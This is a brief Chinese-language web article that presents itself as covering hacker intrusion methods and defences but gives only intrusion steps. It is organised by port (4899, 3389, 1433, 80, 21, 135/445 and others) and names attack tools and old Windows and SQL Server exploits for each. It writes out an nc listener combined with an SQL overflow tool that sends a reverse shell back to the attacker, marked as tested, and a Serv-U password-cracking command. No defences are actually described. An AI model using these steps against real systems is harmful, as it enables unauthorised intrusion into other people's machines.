常見的黑客入侵方法與防範

  本文簡單介紹目前黑客最常使用的一些入侵工具及防禦的方法,希望能對大家有所幫助,以助於大家能更好地防禦黑客的攻擊,下面小編來告訴你吧!

  1. 利用4899埠入侵

  4899埠是一個遠端控制軟體***remote administrator***服務端監聽的埠,他不能算是一個木馬程式,但是具有遠端控制功能,通常防毒軟體是無法查出它來的

  用4899過濾器.exe,掃描空口令的機器

  2. 利用3899的入侵

  對很早的機器,可以試試3389的溢位

  對2000的機器,可以試試字典暴破。

  3.利用1433埠入侵

  1433埠,是SQL Server預設的埠,SQL Server服務使用兩個埠:TCP-1433、UDP-1434。其中1433用於供SQL Server對外提供服務,1434用於向請求者返回SQL Server使用了哪個TCP/IP埠。

  scanport.exe 查有1433的機器

  SQLScanPass.exe 進行字典暴破***字典是關鍵***

  最後 SQLTools.exe入侵

  對sql的sp2及以下的系統,可用sql的hello 溢位漏洞入侵。

  nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠

  ***以上反向的,測試成功***

  sqlhelloz.exe 入侵ip 1433 ***這個是正向連線***

  4. 利用80埠入侵

  80埠是為HTTP***HyperText Transport Protocol***即超文字傳輸協議開放的,此為上網衝浪使用次數最多的協議,主要用於WWW***World Wide Web***即全球資訊網傳輸資訊的協議。可以通過HTTP地址***即常說的“網址”***加“:80”來訪問網站,因為瀏覽網頁服務預設的埠號都是80,因此只需輸入網址即可,不用輸入“:80”了。

  對sp3以前的機器,可以用webdav入侵;

  對bbs論壇,可以試試上傳漏洞***upfile.exe或dvup_delphi.exe***

  可以利用SQL進行注入。***小榕的注入軟體***。

  5. 利用serv-u入侵***21埠***

  21埠主要用於FTP***File Transfer Protocol,檔案傳輸協議***服務,FTP服務主要是為了在兩臺計算機之間實現檔案的上傳與下載,一臺計算機作為FTP客戶端,另一臺計算機作為FTP伺服器,可以採用匿名***anonymous***登入和授權使用者名稱與密碼登入兩種方式登入FTP伺服器。

  對5. 004及以下系統,可用溢位入侵。***serv5004.exe***

  對5.1.0.0及以下系統,可用本地提升許可權。***servlocal.exe***

  對serv-u的MD5加密密碼,可以用字典暴破。***crack.vbs***

  輸入一個被serv-u加密的密碼***34位長***,通過與字典檔***dict.txt***的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

  6. 利用554埠

  用real554.exe入侵。

  7. 利用6129埠

  用DameWare6129.exe入侵。

  8. 利用系統漏洞

  利用135、445埠,用ms03026、ms03039、ms03049、ms04011漏洞,

  進行溢位入侵。

  9. 利用3127等埠

  可以利用doom病毒開的埠,用nodoom.exe入侵。***可用mydoomscan.exe查***。

  10. 利用其他入侵

  利用shanlu的入侵軟體入侵***WINNTAutoAttack.exe***。